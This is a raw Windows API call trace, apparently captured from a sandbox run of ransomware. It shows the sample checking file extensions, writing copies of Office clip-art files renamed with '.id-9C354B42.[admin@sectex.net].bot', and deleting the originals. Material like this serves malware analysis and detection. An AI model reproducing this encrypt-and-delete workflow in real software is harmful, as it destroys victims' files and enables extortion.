	[0157.770] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.770] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0157.770] SetEndOfFile (hFile=0x268) returned 1
	[0157.770] CloseHandle (hObject=0x268) returned 1
	[0157.770] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.771] SetEndOfFile (hFile=0x3c4) returned 1
	[0157.775] CloseHandle (hObject=0x3c4) returned 1
	[0157.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.775] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf")) returned 1
	[0157.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.776] lstrlenW (lpString=".doc") returned 4
	[0157.776] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.776] lstrlenW (lpString=".docx") returned 5
	[0157.776] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0157.776] lstrlenW (lpString=".pdf") returned 4
	[0157.776] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.776] lstrlenW (lpString=".xls") returned 4
	[0157.776] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.776] lstrlenW (lpString=".xlsx") returned 5
	[0157.776] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0157.776] lstrlenW (lpString=".ppt") returned 4
	[0157.776] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.776] lstrlenW (lpString=".zip") returned 4
	[0157.776] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.776] lstrlenW (lpString=".rar") returned 4
	[0157.777] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString=".bz2") returned 4
	[0157.777] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString=".7z") returned 3
	[0157.777] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.777] lstrlenW (lpString=".dbf") returned 4
	[0157.777] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.777] lstrlenW (lpString=".1cd") returned 4
	[0157.777] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.777] lstrlenW (lpString=".jpg") returned 4
	[0157.777] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.777] lstrlenW (lpString=".doc") returned 4
	[0157.777] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString=".docx") returned 5
	[0157.777] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0157.777] lstrlenW (lpString=".pdf") returned 4
	[0157.777] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString=".xls") returned 4
	[0157.777] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.777] lstrlenW (lpString=".xlsx") returned 5
	[0157.777] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0157.777] lstrlenW (lpString=".ppt") returned 4
	[0157.777] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.777] lstrlenW (lpString=".zip") returned 4
	[0157.777] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.778] lstrlenW (lpString=".rar") returned 4
	[0157.778] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.778] lstrlenW (lpString=".bz2") returned 4
	[0157.778] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.778] lstrlenW (lpString=".7z") returned 3
	[0157.778] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.778] lstrlenW (lpString=".dbf") returned 4
	[0157.778] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.778] lstrlenW (lpString=".1cd") returned 4
	[0157.778] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned 63
	[0157.778] lstrlenW (lpString=".jpg") returned 4
	[0157.778] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.778] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0157.778] lstrlenW (lpString="J0105292.WMF") returned 12
	[0157.778] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.779] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=14868) returned 1
	[0157.779] CloseHandle (hObject=0x3c4) returned 1
	[0157.779] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf")) returned 0x20
	[0157.779] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.779] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.779] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0157.780] GetLastError () returned 0x0
	[0157.780] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3a14, lpOverlapped=0x0) returned 1
	[0157.793] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3a20, lpOverlapped=0x0) returned 1
	[0157.794] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.794] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0157.794] SetEndOfFile (hFile=0x268) returned 1
	[0157.794] CloseHandle (hObject=0x268) returned 1
	[0157.794] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.794] SetEndOfFile (hFile=0x3c4) returned 1
	[0157.797] CloseHandle (hObject=0x3c4) returned 1
	[0157.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf")) returned 1
	[0157.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.798] lstrlenW (lpString=".doc") returned 4
	[0157.798] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.798] lstrlenW (lpString=".docx") returned 5
	[0157.798] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0157.798] lstrlenW (lpString=".pdf") returned 4
	[0157.798] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.798] lstrlenW (lpString=".xls") returned 4
	[0157.798] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.798] lstrlenW (lpString=".xlsx") returned 5
	[0157.798] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0157.798] lstrlenW (lpString=".ppt") returned 4
	[0157.798] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.798] lstrlenW (lpString=".zip") returned 4
	[0157.798] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.798] lstrlenW (lpString=".rar") returned 4
	[0157.798] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.798] lstrlenW (lpString=".bz2") returned 4
	[0157.798] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.798] lstrlenW (lpString=".7z") returned 3
	[0157.798] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.798] lstrlenW (lpString=".dbf") returned 4
	[0157.798] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.798] lstrlenW (lpString=".1cd") returned 4
	[0157.798] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.798] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.799] lstrlenW (lpString=".jpg") returned 4
	[0157.799] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.799] lstrlenW (lpString=".doc") returned 4
	[0157.799] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString=".docx") returned 5
	[0157.799] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0157.799] lstrlenW (lpString=".pdf") returned 4
	[0157.799] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString=".xls") returned 4
	[0157.799] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.799] lstrlenW (lpString=".xlsx") returned 5
	[0157.799] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0157.799] lstrlenW (lpString=".ppt") returned 4
	[0157.799] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.799] lstrlenW (lpString=".zip") returned 4
	[0157.799] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.799] lstrlenW (lpString=".rar") returned 4
	[0157.799] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString=".bz2") returned 4
	[0157.799] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString=".7z") returned 3
	[0157.799] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.799] lstrlenW (lpString=".dbf") returned 4
	[0157.799] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.799] lstrlenW (lpString=".1cd") returned 4
	[0157.799] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF") returned 63
	[0157.800] lstrlenW (lpString=".jpg") returned 4
	[0157.800] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.800] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0157.800] lstrlenW (lpString="J0105298.WMF") returned 12
	[0157.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.820] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6320) returned 1
	[0157.823] CloseHandle (hObject=0x3c4) returned 1
	[0157.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf")) returned 0x20
	[0157.823] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0158.408] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.408] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0158.409] GetLastError () returned 0x0
	[0158.409] ReadFile (in: hFile=0x3d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x18b0, lpOverlapped=0x0) returned 1
	[0158.507] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x18c0, lpOverlapped=0x0) returned 1
	[0158.508] ReadFile (in: hFile=0x3d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.508] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.508] SetEndOfFile (hFile=0x268) returned 1
	[0158.508] CloseHandle (hObject=0x268) returned 1
	[0158.508] SetFilePointerEx (in: hFile=0x3d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.508] SetEndOfFile (hFile=0x3d8) returned 1
	[0158.510] CloseHandle (hObject=0x3d8) returned 1
	[0158.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.511] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf")) returned 1
	[0158.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.511] lstrlenW (lpString=".doc") returned 4
	[0158.511] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.511] lstrlenW (lpString=".docx") returned 5
	[0158.511] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.511] lstrlenW (lpString=".pdf") returned 4
	[0158.511] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.511] lstrlenW (lpString=".xls") returned 4
	[0158.511] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.512] lstrlenW (lpString=".xlsx") returned 5
	[0158.512] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.512] lstrlenW (lpString=".ppt") returned 4
	[0158.512] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.512] lstrlenW (lpString=".zip") returned 4
	[0158.512] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.512] lstrlenW (lpString=".rar") returned 4
	[0158.512] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString=".bz2") returned 4
	[0158.512] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString=".7z") returned 3
	[0158.512] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.512] lstrlenW (lpString=".dbf") returned 4
	[0158.512] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.512] lstrlenW (lpString=".1cd") returned 4
	[0158.512] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.512] lstrlenW (lpString=".jpg") returned 4
	[0158.512] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.512] lstrlenW (lpString=".doc") returned 4
	[0158.512] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString=".docx") returned 5
	[0158.512] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0158.512] lstrlenW (lpString=".pdf") returned 4
	[0158.512] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0158.512] lstrlenW (lpString=".xls") returned 4
	[0158.512] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0158.513] lstrlenW (lpString=".xlsx") returned 5
	[0158.513] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0158.513] lstrlenW (lpString=".ppt") returned 4
	[0158.513] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0158.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.513] lstrlenW (lpString=".zip") returned 4
	[0158.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0158.513] lstrlenW (lpString=".rar") returned 4
	[0158.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0158.513] lstrlenW (lpString=".bz2") returned 4
	[0158.513] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0158.513] lstrlenW (lpString=".7z") returned 3
	[0158.513] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0158.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.513] lstrlenW (lpString=".dbf") returned 4
	[0158.513] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0158.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.513] lstrlenW (lpString=".1cd") returned 4
	[0158.513] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0158.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF") returned 63
	[0158.513] lstrlenW (lpString=".jpg") returned 4
	[0158.513] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0158.513] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0158.513] lstrlenW (lpString="J0105368.WMF") returned 12
	[0158.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0158.627] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12380) returned 1
	[0158.627] CloseHandle (hObject=0x1d8) returned 1
	[0158.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf")) returned 0x20
	[0158.627] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8
	[0158.628] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.628] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0158.629] GetLastError () returned 0x0
	[0158.629] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x305c, lpOverlapped=0x0) returned 1
	[0158.741] WriteFile (in: hFile=0x3d8, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3060, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3060, lpOverlapped=0x0) returned 1
	[0158.742] ReadFile (in: hFile=0x1d8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
